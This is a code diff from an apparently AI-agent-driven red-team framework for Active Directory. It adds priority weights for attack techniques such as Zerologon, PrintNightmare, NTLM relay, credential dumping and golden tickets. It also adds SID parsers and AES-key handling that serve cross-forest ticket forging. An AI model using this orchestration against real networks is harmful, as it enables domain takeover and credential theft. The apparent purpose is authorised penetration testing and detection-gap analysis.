0 from e.g. "host10" — + // only strip if the char before the 0 is alphabetic (TLD-like). + Some(clean) if clean.ends_with(|c: char| c.is_ascii_alphabetic()) => clean, + _ => s, + }, + } +} + /// Check if a hostname is an AWS internal PTR name. pub(super) fn is_aws_hostname(hostname: &str) -> bool { let lower = hostname.to_lowercase(); @@ -137,6 +154,8 @@ mod tests { } } + // --- sanitize_credential --- + #[test] fn valid_credential_passes_through() { let cred = make_cred("alice", "P@ssw0rd!", "contoso.local"); @@ -269,6 +288,8 @@ mod tests { assert!(sanitize_credential(cred, &HashMap::new()).is_none()); } + // --- is_aws_hostname --- + #[test] fn aws_hostname_detected() { assert!(is_aws_hostname("ip-10-0-0-1.ec2.compute.internal")); @@ -288,4 +309,48 @@ mod tests { fn ip_prefix_without_compute_internal_rejected() { assert!(!is_aws_hostname("ip-missing-suffix.local")); } + + // --- strip_netexec_artifact --- + + #[test] + fn strip_netexec_zero_dot() { + assert_eq!( + strip_netexec_artifact("dc01.contoso.local0."), + "dc01.contoso.local" + ); + } + + #[test] + fn strip_netexec_zero_no_dot() { + assert_eq!( + strip_netexec_artifact("dc01.contoso.local0"), + "dc01.contoso.local" + ); + } + + #[test] + fn strip_netexec_preserves_clean_hostname() { + assert_eq!( + strip_netexec_artifact("dc01.contoso.local"), + "dc01.contoso.local" + ); + } + + #[test] + fn strip_netexec_preserves_numeric_suffix() { + // Must NOT strip the 0 from "host10" or "dc10" + assert_eq!(strip_netexec_artifact("host10"), "host10"); + assert_eq!( + strip_netexec_artifact("dc10.contoso.local"), + "dc10.contoso.local" + ); + } + + #[test] + fn strip_netexec_child_domain() { + assert_eq!( + strip_netexec_artifact("dc02.child.contoso.local0."), + "dc02.child.contoso.local" + ); + } } diff --git a/ares-cli/src/orchestrator/strategy.rs b/ares-cli/src/orchestrator/strategy.rs index 22fb9f6f..347d795f 100644 --- a/ares-cli/src/orchestrator/strategy.rs +++ b/ares-cli/src/orchestrator/strategy.rs @@ -292,45 +292,126 @@ fn fast_weights() -> HashMap { ("adcs_esc8", 5), ("gpo_abuse", 6), ("laps", 4), + ("ntlm_relay", 5), + ("nopac", 4), + ("zerologon", 3), + ("printnightmare", 6), + ("share_coercion", 5), + ("mssql_coercion", 4), + ("password_policy", 3), + ("gpp_sysvol", 3), + ("ntlmv1_downgrade", 3), + ("ldap_signing", 3), + ("webdav_detection", 4), + ("spooler_check", 3), + ("machine_account_quota", 3), + ("dfs_coercion", 5), + ("petitpotam_unauth", 4), + ("winrm_lateral", 5), + ("group_enumeration", 2), + ("localuser_spray", 4), + ("krbrelayup", 5), + ("searchconnector_coercion", 5), + ("lsassy_dump", 3), + ("rdp_lateral", 5), + ("foreign_group_enum", 3), + ("certipy_auth", 2), + ("sid_enumeration", 3), + ("dns_enum", 3), + ("domain_user_enumeration", 2), + ("pth_spray", 4), + ("certifried", 4), + ("dacl_abuse", 2), + ("smbclient_enum", 4), + ("cross_forest_enum", 3), + ("acl_discovery", 2), ] .into_iter() .map(|(k, v)| (k.to_string(), v)) .collect() } -/// Comprehensive: flat priorities so all techniques get equal attention. +/// Comprehensive: prioritize exploitation breadth over speed-to-DA. +/// +/// With flat priorities (old design), the deferred queue drained FIFO, meaning +/// the credential pipeline (AS-REP → Kerberoast → secretsdump) always won +/// because its conditions were met first. ADCS, delegation, NTLM relay, and +/// other exploitation techniques never got slots before DA terminated the op. +/// +/// This design uses 3 tiers: +/// 1 = high-value exploitation (ADCS, delegation, NTLM relay, ACL abuse) +/// 2 = credential pipeline + lateral movement +/// 3 = recon, enumeration, low-value checks +/// +/// The goal: exploit *everything* discovered, not just the fastest path to DA. fn comprehensive_weights() -> HashMap { [ - ("dc_secretsdump", 3), - ("golden_ticket", 3), - ("forest_trust_escalation", 3), - ("child_to_parent", 3), - ("domain_admin", 3), - ("secretsdump", 3), - ("credential_reuse", 3), - ("mssql_access", 3), - ("mssql_linked_server", 3), - ("mssql_impersonation", 3), - ("constrained_delegation", 3), - ("unconstrained_delegation", 3), - ("esc1", 3), - ("esc4", 3), - ("esc8", 3), - ("rbcd", 3), - ("acl_abuse", 3), - ("shadow_credentials", 3), - ("mssql_deep_exploitation", 3), - ("kerberoast", 3), - ("asrep_roast", 3), - ("password_spray", 3), - ("gmsa", 3), - ("low_hanging_fruit", 3), + // --- Tier 1: Exploitation breadth (these were starved before) --- + ("esc1", 1), + ("esc4", 1), + ("esc8", 1), + ("adcs_esc1", 1), + ("adcs_esc4", 1), + ("adcs_esc8", 1), + ("constrained_delegation", 1), + ("unconstrained_delegation", 1), + ("ntlm_relay", 1), + ("rbcd", 1), + ("acl_abuse", 1), + ("dacl_abuse", 1), + ("shadow_credentials", 1), + ("gpo_abuse", 1), + ("nopac", 1), + ("certifried", 1), + ("krbrelayup", 1), + ("printnightmare", 1), + // --- Tier 2: Credential pipeline + lateral + persistence --- + ("dc_secretsdump", 2), + ("golden_ticket", 2), + ("forest_trust_escalation", 2), + ("child_to_parent", 2), + ("domain_admin", 2), + ("secretsdump", 2), + ("credential_reuse", 2), + ("mssql_access", 2), + ("mssql_linked_server", 2), + ("mssql_impersonation", 2), + ("mssql_deep_exploitation", 2), + ("kerberoast", 2), + ("asrep_roast", 2), + ("password_spray", 2), + ("gmsa", 2), + ("laps", 2), + ("low_hanging_fruit", 2), + ("gpp_sysvol", 2), + ("certipy_auth", 2), + ("lsassy_dump", 2), + ("pth_spray", 2), + ("winrm_lateral", 2), + ("rdp_lateral", 2), + ("localuser_spray", 2), + // --- Tier 3: Recon, enumeration, coercion setup --- ("smb_signing_disabled", 3), - ("adcs_esc1", 3), - ("adcs_esc4", 3), - ("adcs_esc8", 3), - ("gpo_abuse", 3), - ("laps", 3), + ("share_coercion", 3), + ("mssql_coercion", 3), + ("password_policy", 3), + ("ntlmv1_downgrade", 3), + ("ldap_signing", 3), + ("webdav_detection", 3), + ("spooler_check", 3), + ("machine_account_quota", 3), + ("dfs_coercion", 3), + ("petitpotam_unauth", 3), + ("group_enumeration", 3), + ("searchconnector_coercion", 3), + ("foreign_group_enum", 3), + ("sid_enumeration", 3), + ("dns_enum", 3), + ("domain_user_enumeration", 3), + ("smbclient_enum", 3), + ("zerologon", 3), + ("cross_forest_enum", 3), + ("acl_discovery", 2), ] .into_iter() .map(|(k, v)| (k.to_string(), v)) @@ -370,6 +451,39 @@ fn stealth_weights() -> HashMap { ("adcs_esc8", 2), ("gpo_abuse", 3), ("laps", 3), + ("ntlm_relay", 7), + ("nopac", 5), + ("zerologon", 4), + ("printnightmare", 8), + ("share_coercion", 6), + ("mssql_coercion", 5), + ("password_policy", 2), + ("gpp_sysvol", 2), + ("ntlmv1_downgrade", 2), + ("ldap_signing", 2), + ("webdav_detection", 3), + ("spooler_check", 2), + ("machine_account_quota", 2), + ("dfs_coercion", 6), + ("petitpotam_unauth", 5), + ("winrm_lateral", 4), + ("group_enumeration", 2), + ("localuser_spray", 7), + ("krbrelayup", 4), + ("searchconnector_coercion", 6), + ("lsassy_dump", 5), + ("rdp_lateral", 4), + ("foreign_group_enum", 2), + ("certipy_auth", 1), + ("sid_enumeration", 2), + ("dns_enum", 2), + ("domain_user_enumeration", 2), + ("pth_spray", 5), + ("certifried", 3), + ("dacl_abuse", 2), + ("smbclient_enum", 3), + ("cross_forest_enum", 2), + ("acl_discovery", 1), ] .into_iter() .map(|(k, v)| (k.to_string(), v)) @@ -471,11 +585,20 @@ mod tests { } #[test] - fn comprehensive_flat_weights() { + fn comprehensive_tiered_weights() { let s = Strategy::from_preset(StrategyPreset::Comprehensive); - assert_eq!(s.effective_priority("secretsdump"), 3); - assert_eq!(s.effective_priority("esc1"), 3); - assert_eq!(s.effective_priority("acl_abuse"), 3); + // Tier 1: exploitation breadth — highest priority + assert_eq!(s.effective_priority("esc1"), 1); + assert_eq!(s.effective_priority("acl_abuse"), 1); + assert_eq!(s.effective_priority("constrained_delegation"), 1); + assert_eq!(s.effective_priority("ntlm_relay"), 1); + // Tier 2: credential pipeline + assert_eq!(s.effective_priority("secretsdump"), 2); + assert_eq!(s.effective_priority("kerberoast"), 2); + assert_eq!(s.effective_priority("golden_ticket"), 2); + // Tier 3: recon/enumeration + assert_eq!(s.effective_priority("group_enumeration"), 3); + assert_eq!(s.effective_priority("dns_enum"), 3); } #[test] @@ -625,7 +748,44 @@ mod tests { #[test] fn new_technique_weights_in_presets() { // Verify that new techniques added in this branch are in all presets - let new_techniques = ["rbcd", "shadow_credentials", "mssql_deep_exploitation"]; + let new_techniques = [ + "rbcd", + "shadow_credentials", + "mssql_deep_exploitation", + "ntlm_relay", + "nopac", + "zerologon", + "printnightmare", + "share_coercion", + "mssql_coercion", + "password_policy", + "gpp_sysvol", + "ntlmv1_downgrade", + "ldap_signing", + "webdav_detection", + "spooler_check", + "machine_account_quota", + "dfs_coercion", + "petitpotam_unauth", + "winrm_lateral", + "group_enumeration", + "localuser_spray", + "krbrelayup", + "searchconnector_coercion", + "lsassy_dump", + "rdp_lateral", + "foreign_group_enum", + "certipy_auth", + "sid_enumeration", + "dns_enum", + "domain_user_enumeration", + "pth_spray", + "certifried", + "dacl_abuse", + "smbclient_enum", + "cross_forest_enum", + "acl_discovery", + ]; for preset in [ StrategyPreset::Fast, StrategyPreset::Comprehensive, @@ -643,20 +803,26 @@ mod tests { } #[test] - fn comprehensive_has_equal_weights() { + fn comprehensive_has_tiered_weights() { let s = Strategy::from_preset(StrategyPreset::Comprehensive); - // All comprehensive weights should be 3 + // All weights should be 1, 2, or 3 for (tech, weight) in &s.weights { - assert_eq!(*weight, 3, "Technique {tech} has weight {weight} != 3"); + assert!( + (1..=3).contains(weight), + "Technique {tech} has weight {weight}, expected 1-3" + ); } } #[test] fn stealth_penalizes_noisy_techniques() { let s = Strategy::from_preset(StrategyPreset::Stealth); - // Password spray and SMB signing should be most penalized (8) + // Password spray, SMB signing, and PrintNightmare should be most penalized (8) assert_eq!(s.effective_priority("password_spray"), 8); assert_eq!(s.effective_priority("smb_signing_disabled"), 8); + assert_eq!(s.effective_priority("printnightmare"), 8); + // NTLM relay is noisy too (7) + assert_eq!(s.effective_priority("ntlm_relay"), 7); // ADCS/ACL should be most prioritized (1) assert_eq!(s.effective_priority("esc1"), 1); assert_eq!(s.effective_priority("acl_abuse"), 1); diff --git a/ares-cli/src/orchestrator/task_queue.rs b/ares-cli/src/orchestrator/task_queue.rs index 45aba1a1..69e8722e 100644 --- a/ares-cli/src/orchestrator/task_queue.rs +++ b/ares-cli/src/orchestrator/task_queue.rs @@ -81,6 +81,10 @@ pub struct HeartbeatData { pub pod_name: Option, } +// --------------------------------------------------------------------------- +// TaskQueueCore — thin async wrapper around a redis connection. +// --------------------------------------------------------------------------- + /// Async Redis task queue implementing the Ares queue protocol. /// /// Generic over connection type to support both production (`ConnectionManager`) diff --git a/ares-cli/src/orchestrator/throttling.rs b/ares-cli/src/orchestrator/throttling.rs index ff4ecee8..392a466a 100644 --- a/ares-cli/src/orchestrator/throttling.rs +++ b/ares-cli/src/orchestrator/throttling.rs @@ -129,7 +129,7 @@ impl Throttler { if llm_count >= max_tasks { let role_count = self.tracker.count_for_role(target_role).await; - let min_per_role = 1_usize; // matches get_min_slots_per_role default + let min_per_role = self.config.max_tasks_per_role; if role_count < min_per_role { info!( llm_count, diff --git a/ares-cli/src/orchestrator/tool_dispatcher/mod.rs b/ares-cli/src/orchestrator/tool_dispatcher/mod.rs index 0e8d4155..686f0b53 100644 --- a/ares-cli/src/orchestrator/tool_dispatcher/mod.rs +++ b/ares-cli/src/orchestrator/tool_dispatcher/mod.rs @@ -80,6 +80,7 @@ const RECON_ROUTED_TOOLS: &[&str] = &[ "smbclient_spider", "check_credman_entries", "check_autologon_registry", + "smb_login_check", "domain_admin_checker", "gmsa_dump_passwords", ]; @@ -98,6 +99,7 @@ const AUTH_BEARING_TOOLS: &[&str] = &[ "smbclient_spider", "check_credman_entries", "check_autologon_registry", + "smb_login_check", "domain_admin_checker", "gmsa_dump_passwords", // impacket tools diff --git a/ares-cli/src/worker/task_loop/result_handler.rs b/ares-cli/src/worker/task_loop/result_handler.rs index a185d89d..c703fd26 100644 --- a/ares-cli/src/worker/task_loop/result_handler.rs +++ b/ares-cli/src/worker/task_loop/result_handler.rs @@ -81,12 +81,12 @@ pub async fn process_task( if let Some(ref usage) = ar.usage { result_payload["usage"] = serde_json::to_value(usage).unwrap_or_default(); } - // Include structured discoveries parsed from tool output + // Include structured discoveries parsed from tool output. + // Must be nested under "discoveries" — the orchestrator's + // process_completed_task extracts from payload["discoveries"]. if let Some(ref disc) = ar.discoveries { - if let Some(obj) = disc.as_object() { - for (k, v) in obj { - result_payload[k] = v.clone(); - } + if disc.as_object().is_some_and(|o| !o.is_empty()) { + result_payload["discoveries"] = disc.clone(); } } ( diff --git a/ares-cli/src/worker/tool_executor.rs b/ares-cli/src/worker/tool_executor.rs index 2dcbdf69..35255781 100644 --- a/ares-cli/src/worker/tool_executor.rs +++ b/ares-cli/src/worker/tool_executor.rs @@ -287,23 +287,53 @@ async fn execute_and_respond( Some(discoveries) }; - // Emit discovery spans for observability + // Emit discovery spans for observability. + // For "hosts" discoveries, emit one span per discovered host so each + // gets a clean destination.address (instead of the raw CIDR/multi-IP + // input target). Other discovery types use the extracted target info. if let Some(ref disc) = discoveries { if let Some(obj) = disc.as_object() { for (disc_type, items) in obj { - let count = items.as_array().map(|a| a.len()).unwrap_or(0); - if count > 0 { - let span = trace_discovery( - disc_type, - &request.tool_name, - di.target_user.as_deref(), - None, - di.target_ip.as_deref(), - di.target_fqdn.as_deref(), - dt, - request.operation_id.as_deref(), - ); - let _guard = span.enter(); + if disc_type == "hosts" { + // Per-host spans with individual IPs/hostnames + if let Some(hosts) = items.as_array() { + for host in hosts { + let host_ip = host.get("ip").and_then(|v| v.as_str()); + let host_fqdn = host + .get("hostname") + .and_then(|v| v.as_str()) + .filter(|h| !h.is_empty()); + let host_target_type = host_fqdn + .map(ares_core::telemetry::target::infer_target_type) + .or(dt); + let span = trace_discovery( + disc_type, + &request.tool_name, + di.target_user.as_deref(), + None, + host_ip, + host_fqdn, + host_target_type, + request.operation_id.as_deref(), + ); + let _guard = span.enter(); + } + } + } else { + let count = items.as_array().map(|a| a.len()).unwrap_or(0); + if count > 0 { + let span = trace_discovery( + disc_type, + &request.tool_name, + di.target_user.as_deref(), + None, + di.target_ip.as_deref(), + di.target_fqdn.as_deref(), + dt, + request.operation_id.as_deref(), + ); + let _guard = span.enter(); + } } } } diff --git a/ares-core/src/correlation/redblue/tests.rs b/ares-core/src/correlation/redblue/tests.rs index 319e70dd..5f5c0264 100644 --- a/ares-core/src/correlation/redblue/tests.rs +++ b/ares-core/src/correlation/redblue/tests.rs @@ -769,6 +769,10 @@ fn new_custom_time_window() { assert_eq!(correlator.time_window.num_minutes(), 60); } +// ----------------------------------------------------------------------- +// recommend_detection — exhaustive per-technique checks +// ----------------------------------------------------------------------- + #[test] fn recommend_detection_t1046_mentions_scanning() { let activity = make_red_activity("T1046", "192.168.58.10", utc(12, 0)); @@ -817,6 +821,10 @@ fn recommend_detection_unknown_technique_returns_none() { assert!(RedBlueCorrelator::recommend_detection(&activity).is_none()); } +// ----------------------------------------------------------------------- +// determine_gap_reason — additional edge cases +// ----------------------------------------------------------------------- + #[test] fn determine_gap_reason_empty_detections_list() { let activity = make_red_activity("T1046", "192.168.58.10", utc(12, 0)); @@ -838,6 +846,10 @@ fn determine_gap_reason_technique_matches_via_parent() { assert!(reason.contains("Alert exists but did not trigger")); } +// ----------------------------------------------------------------------- +// correlate — additional edge cases +// ----------------------------------------------------------------------- + #[test] fn correlate_false_positive_rate_zero_when_no_detections_in_window() { let correlator = RedBlueCorrelator::new("/tmp", Some(5)); diff --git a/ares-core/src/parsing/domain_sid.rs b/ares-core/src/parsing/domain_sid.rs index b7ee5a01..614c307e 100644 --- a/ares-core/src/parsing/domain_sid.rs +++ b/ares-core/src/parsing/domain_sid.rs @@ -6,15 +6,64 @@ use std::sync::LazyLock; static DOMAIN_SID_RE: LazyLock = LazyLock::new(|| Regex::new(r"S-1-5-21-\d+-\d+-\d+").expect("domain sid regex")); +/// Match the impacket-lookupsid "Domain SID is:" announcement line — the +/// authoritative signal that the surrounding output is a genuine LSARPC SID +/// brute-force, not arbitrary recon text containing stray SIDs. +pub static LOOKUPSID_HEADER_RE: LazyLock = LazyLock::new(|| { + Regex::new(r"(?m)^\[\*\]\s+Domain SID is:\s+(S-1-5-21-\d+-\d+-\d+)") + .expect("lookupsid header regex") +}); + +/// Match `rpcclient -c lsaquery` output. Produces: +/// +/// ```text +/// Domain Name: ESSOS +/// Domain Sid: S-1-5-21-3030751166-2423545109-3706592460 +/// ``` +/// +/// Like impacket-lookupsid, this is an authoritative LSARPC response — the +/// flat name and SID together belong to the queried server's primary domain. +/// Often works with anonymous/null sessions where impacket-lookupsid fails, +/// so it's the primary unauth path for cross-forest target SID discovery. +pub static LSAQUERY_DOMAIN_SID_RE: LazyLock = LazyLock::new(|| { + Regex::new(r"(?m)^Domain Name:\s+(\S+)\s*\r?\nDomain Sid:\s+(S-1-5-21-\d+-\d+-\d+)") + .expect("lsaquery domain sid regex") +}); + /// Regex to extract the RID-500 account name from lookupsid output. /// Matches lines like: `500: DOMAIN\AccountName (SidTypeUser)` static RID500_RE: LazyLock = LazyLock::new(|| { Regex::new(r"(?m)^500:\s+[^\\]+\\(.+?)\s+\(SidTypeUser\)").expect("rid500 regex") }); -/// Extract the first domain SID (`S-1-5-21-...`) found in the output. +/// Regex matching any RID line in lookupsid output to capture the flat/NetBIOS +/// domain name. Matches lines like: `500: DOMAIN\AccountName (SidType...)`. +static RID_FLAT_NAME_RE: LazyLock = LazyLock::new(|| { + Regex::new(r"(?m)^\d+:\s+([^\\\s]+)\\.+?\s+\(SidType").expect("rid flat name regex") +}); + +/// Extract the first *bare* domain SID (`S-1-5-21-A-B-C`) found in the output. +/// +/// "Bare" means the matched SID is **not** the prefix of a longer principal +/// SID like `S-1-5-21-A-B-C-RID`. Such longer SIDs appear in LDAP recon +/// output as Foreign Security Principals (e.g. `S-1-5-21-…-519` for a +/// foreign Enterprise Admins group) and previously caused this function to +/// truncate them into a fake "domain SID" that didn't belong to any domain +/// — which then misled the orchestrator into forging tickets with the wrong +/// ExtraSid. pub fn extract_domain_sid(output: &str) -> Option { - DOMAIN_SID_RE.find(output).map(|m| m.as_str().to_string()) + let bytes = output.as_bytes(); + for m in DOMAIN_SID_RE.find_iter(output) { + let end = m.end(); + let next = bytes.get(end).copied(); + let after_next = bytes.get(end + 1).copied(); + // Reject when the match is followed by `-` (truncated longer SID). + if next == Some(b'-') && matches!(after_next, Some(b) if b.is_ascii_digit()) { + continue; + } + return Some(m.as_str().to_string()); + } + None } /// Extract the account name for RID 500 from lookupsid output. @@ -27,6 +76,36 @@ pub fn extract_rid500_name(output: &str) -> Option { RID500_RE.captures(output).map(|c| c[1].to_string()) } +/// Extract `(flat_name, sid)` together from lookupsid output, anchoring the +/// SID to the NetBIOS/flat name visible on the same RID lines. +/// +/// Returns `None` if either the SID or the flat name is missing — the caller +/// must then resolve the FQDN itself rather than guessing from task context. +/// +/// Why this matters: a task targeting `north.contoso.local` can produce output +/// referencing `S-1-5-21-…` for the trusted forest's domain (e.g. via lookupsid +/// over a foreign trust). Anchoring to the flat name lets the caller map the +/// SID to the correct FQDN via `netbios_to_fqdn` instead of misattributing it +/// to the task's source domain. +pub fn extract_domain_sid_and_flat_name(output: &str) -> Option<(String, String)> { + let sid = extract_domain_sid(output)?; + let flat = RID_FLAT_NAME_RE + .captures(output) + .map(|c| c[1].to_uppercase())?; + Some((flat, sid)) +} + +/// Extract `(flat_name, sid)` from `rpcclient lsaquery` output. Returns the +/// queried server's primary-domain flat name (uppercased) paired with the +/// authoritative LSARPC-reported domain SID. Returns `None` if the output is +/// not from `lsaquery` or only one of the two fields is present. +pub fn extract_lsaquery_domain_sid(output: &str) -> Option<(String, String)> { + let caps = LSAQUERY_DOMAIN_SID_RE.captures(output)?; + let flat = caps.get(1)?.as_str().to_uppercase(); + let sid = caps.get(2)?.as_str().to_string(); + Some((flat, sid)) +} + #[cfg(test)] mod tests { use super::*; @@ -103,4 +182,138 @@ mod tests { None ); } + + #[test] + fn extracts_flat_name_alongside_sid() { + let output = "[*] Brute forcing SIDs at 192.168.58.10\n\ + [*] Domain SID is: S-1-5-21-100-200-300\n\ + 498: CONTOSO\\Enterprise Read-only Domain Controllers (SidTypeGroup)\n\ + 500: CONTOSO\\Administrator (SidTypeUser)\n"; + let result = extract_domain_sid_and_flat_name(output); + assert_eq!( + result, + Some(("CONTOSO".to_string(), "S-1-5-21-100-200-300".to_string())) + ); + } + + #[test] + fn extract_flat_name_and_sid_uppercases() { + let output = "[*] Domain SID is: S-1-5-21-1-2-3\n\ + 500: contoso\\Administrator (SidTypeUser)\n"; + let result = extract_domain_sid_and_flat_name(output); + assert_eq!(result.as_ref().map(|(f, _)| f.as_str()), Some("CONTOSO")); + } + + #[test] + fn extract_flat_name_without_sid_returns_none() { + let output = "500: CONTOSO\\Administrator (SidTypeUser)\n"; + assert_eq!(extract_domain_sid_and_flat_name(output), None); + } + + #[test] + fn extract_flat_name_without_rid_lines_returns_none() { + let output = "[*] Domain SID is: S-1-5-21-1-2-3\n"; + assert_eq!(extract_domain_sid_and_flat_name(output), None); + } + + #[test] + fn extract_domain_sid_skips_truncated_principal_sid() { + // Foreign-security-principal SID `…-519` (Enterprise Admins) must NOT + // be silently truncated to a fake domain SID. This was the root cause + // of op-20260429-164553 forging a ticket with the wrong ExtraSid. + let output = "objectSid: S-1-5-21-3030751166-2423545109-3706592460-519\n"; + assert_eq!(extract_domain_sid(output), None); + } + + #[test] + fn extract_domain_sid_skips_principal_returns_later_bare_sid() { + let output = + "fsp: S-1-5-21-100-200-300-519\nDomain SID is: S-1-5-21-916080216-17955212-404331485\n"; + assert_eq!( + extract_domain_sid(output), + Some("S-1-5-21-916080216-17955212-404331485".to_string()) + ); + } + + #[test] + fn extract_domain_sid_accepts_bare_sid_followed_by_dash_letter() { + // A trailing `-` (e.g. inside a CN) is fine — only `-` + // indicates a truncated longer principal SID. + let output = "S-1-5-21-100-200-300-foo\n"; + assert_eq!( + extract_domain_sid(output), + Some("S-1-5-21-100-200-300".to_string()) + ); + } + + #[test] + fn extract_domain_sid_accepts_bare_sid_at_end_of_input() { + let output = "S-1-5-21-100-200-300"; + assert_eq!( + extract_domain_sid(output), + Some("S-1-5-21-100-200-300".to_string()) + ); + } + + #[test] + fn extract_lsaquery_basic() { + let output = "Domain Name: ESSOS\n\ + Domain Sid: S-1-5-21-3030751166-2423545109-3706592460\n"; + assert_eq!( + extract_lsaquery_domain_sid(output), + Some(( + "ESSOS".to_string(), + "S-1-5-21-3030751166-2423545109-3706592460".to_string() + )) + ); + } + + #[test] + fn extract_lsaquery_with_preamble() { + let output = "[*] Connecting to 10.1.2.58\n\ + Domain Name: CONTOSO\n\ + Domain Sid: S-1-5-21-100-200-300\n\ + [*] Done.\n"; + assert_eq!( + extract_lsaquery_domain_sid(output), + Some(("CONTOSO".to_string(), "S-1-5-21-100-200-300".to_string())) + ); + } + + #[test] + fn extract_lsaquery_uppercases_flat_name() { + let output = "Domain Name: contoso\nDomain Sid: S-1-5-21-1-2-3\n"; + assert_eq!( + extract_lsaquery_domain_sid(output).map(|(f, _)| f), + Some("CONTOSO".to_string()) + ); + } + + #[test] + fn extract_lsaquery_handles_crlf() { + let output = "Domain Name: ESSOS\r\nDomain Sid: S-1-5-21-1-2-3\r\n"; + assert_eq!( + extract_lsaquery_domain_sid(output).map(|(_, s)| s), + Some("S-1-5-21-1-2-3".to_string()) + ); + } + + #[test] + fn extract_lsaquery_requires_both_lines() { + // Missing Domain Sid line + let no_sid = "Domain Name: ESSOS\n"; + assert_eq!(extract_lsaquery_domain_sid(no_sid), None); + // Missing Domain Name line + let no_name = "Domain Sid: S-1-5-21-1-2-3\n"; + assert_eq!(extract_lsaquery_domain_sid(no_name), None); + } + + #[test] + fn extract_lsaquery_requires_adjacency() { + // Lines not adjacent — pattern intentionally requires them on + // consecutive lines so we don't pair the wrong (flat, sid) when + // multiple servers/responses are concatenated. + let output = "Domain Name: ESSOS\nUnrelated line here\nDomain Sid: S-1-5-21-1-2-3\n"; + assert_eq!(extract_lsaquery_domain_sid(output), None); + } } diff --git a/ares-core/src/state/mock_redis.rs b/ares-core/src/state/mock_redis.rs index de7bbd13..639cefbf 100644 --- a/ares-core/src/state/mock_redis.rs +++ b/ares-core/src/state/mock_redis.rs @@ -12,6 +12,10 @@ use std::sync::{Arc, Mutex}; use redis::aio::ConnectionLike; use redis::{Cmd, ErrorKind, Pipeline, RedisError, RedisResult, Value}; +// --------------------------------------------------------------------------- +// Storage types +// --------------------------------------------------------------------------- + enum Stored { Str(Vec), Hash(HashMap, Vec>), @@ -21,6 +25,10 @@ enum Stored { type Data = HashMap; +// --------------------------------------------------------------------------- +// MockRedisConnection +// --------------------------------------------------------------------------- + /// Minimal in-memory Redis mock that supports the command subset used by /// `ares-core::state` and `ares-cli::orchestrator::task_queue`. #[derive(Clone)] @@ -96,6 +104,10 @@ impl MockRedisConnection { } } +// --------------------------------------------------------------------------- +// ConnectionLike impl +// --------------------------------------------------------------------------- + impl ConnectionLike for MockRedisConnection { fn req_packed_command<'a>(&'a mut self, cmd: &'a Cmd) -> redis::RedisFuture<'a, Value> { let mut data = self.data.lock().unwrap(); @@ -126,6 +138,10 @@ impl ConnectionLike for MockRedisConnection { } } +// --------------------------------------------------------------------------- +// Command implementations (free functions operating on Data) +// --------------------------------------------------------------------------- + fn key(args: &[Vec], idx: usize) -> String { String::from_utf8_lossy(args.get(idx).map(|v| v.as_slice()).unwrap_or_default()).into_owned() } @@ -523,6 +539,10 @@ fn cmd_scan(data: &Data, args: &[Vec]) -> RedisResult { ])) } +// --------------------------------------------------------------------------- +// Minimal glob matching (supports only `*` wildcard segments) +// --------------------------------------------------------------------------- + fn glob_match(pattern: &str, input: &str) -> bool { let parts: Vec<&str> = pattern.split('*').collect(); if parts.len() == 1 { diff --git a/ares-core/src/state/reader.rs b/ares-core/src/state/reader.rs index 5b6bd72b..d4d3facc 100644 --- a/ares-core/src/state/reader.rs +++ b/ares-core/src/state/reader.rs @@ -347,8 +347,26 @@ impl RedisStateReader { let added: bool = conn.hset_nx(&key, &dedup_field, &data).await?; if added { let _: () = conn.expire(&key, 86400).await?; + return Ok(true); } - Ok(added) + + // Upsert path: a prior call added this user/hash with no AES256 key, + // and this call carries one. Win2016+ DCs reject RC4-only inter-realm + // tickets, so the AES key is required for cross-forest forge — we + // can't afford to lose it to dedup. + if hash.aes_key.is_some() { + let existing: Option = conn.hget(&key, &dedup_field).await?; + let existing_has_aes = existing + .as_deref() + .and_then(|s| serde_json::from_str::(s).ok()) + .and_then(|h| h.aes_key) + .is_some(); + if !existing_has_aes { + let _: () = conn.hset(&key, &dedup_field, &data).await?; + let _: () = conn.expire(&key, 86400).await?; + } + } + Ok(false) } /// Set a meta field in the operation's meta HASH. diff --git a/ares-core/src/telemetry/spans/builder.rs b/ares-core/src/telemetry/spans/builder.rs index 8e6b58c5..e8600c40 100644 --- a/ares-core/src/telemetry/spans/builder.rs +++ b/ares-core/src/telemetry/spans/builder.rs @@ -58,13 +58,24 @@ impl AgentSpanBuilder { self } + /// Set the target IP. Rejects CIDR ranges and multi-value strings. pub fn target_ip(mut self, ip: impl Into) -> Self { - self.target.ip = Some(ip.into()); + let ip = ip.into(); + // Defense-in-depth: reject values that aren't single IP addresses. + // extract_target_info should already sanitize, but guard here too. + if !ip.contains('/') && !ip.contains(' ') && ip.parse::().is_ok() { + self.target.ip = Some(ip); + } self } + /// Set the target FQDN. Rejects multi-value strings. pub fn target_fqdn(mut self, fqdn: impl Into) -> Self { - self.target.fqdn = Some(fqdn.into()); + let fqdn = fqdn.into(); + // Defense-in-depth: reject values containing spaces or slashes + if !fqdn.contains(' ') && !fqdn.contains('/') { + self.target.fqdn = Some(fqdn); + } self } diff --git a/ares-core/src/telemetry/target.rs b/ares-core/src/telemetry/target.rs index d7fd9f26..68eced4d 100644 --- a/ares-core/src/telemetry/target.rs +++ b/ares-core/src/telemetry/target.rs @@ -17,6 +17,11 @@ pub struct ToolTargetInfo { /// - IP: `target_ip`, `target`, `host`, `ip` (if it looks like an IP) /// - FQDN: `target_fqdn`, `target`, `host`, `hostname` (if it looks like an FQDN) /// - User: `username`, `user`, `target_user` +/// +/// Values are sanitized before validation: multi-token strings (e.g., +/// `"192.168.58.10 192.168.58.20"` or nmap arguments) are split and only the +/// first token is considered. CIDR ranges (`10.0.0.0/24`) are rejected +/// because they represent networks, not individual hosts. pub fn extract_target_info(arguments: &serde_json::Value) -> ToolTargetInfo { let mut info = ToolTargetInfo::default(); @@ -25,21 +30,23 @@ pub fn extract_target_info(arguments: &serde_json::Value) -> ToolTargetInfo { None => return info, }; - // Extract IP + // Extract IP — sanitize multi-token values first for key in &["target_ip", "target", "host", "ip"] { if let Some(val) = obj.get(*key).and_then(|v| v.as_str()) { - if is_ip_address(val) { - info.target_ip = Some(val.to_string()); + let sanitized = first_token(val); + if !is_cidr(sanitized) && is_ip_address(sanitized) { + info.target_ip = Some(sanitized.to_string()); break; } } } - // Extract FQDN + // Extract FQDN — sanitize multi-token values first for key in &["target_fqdn", "target", "host", "hostname"] { if let Some(val) = obj.get(*key).and_then(|v| v.as_str()) { - if is_likely_fqdn(val) { - info.target_fqdn = Some(val.to_string()); + let sanitized = first_token(val); + if is_likely_fqdn(sanitized) { + info.target_fqdn = Some(sanitized.to_string()); break; } } @@ -110,6 +117,29 @@ pub fn infer_target_type_from_info(info: &ToolTargetInfo) -> Option<&'static str None } 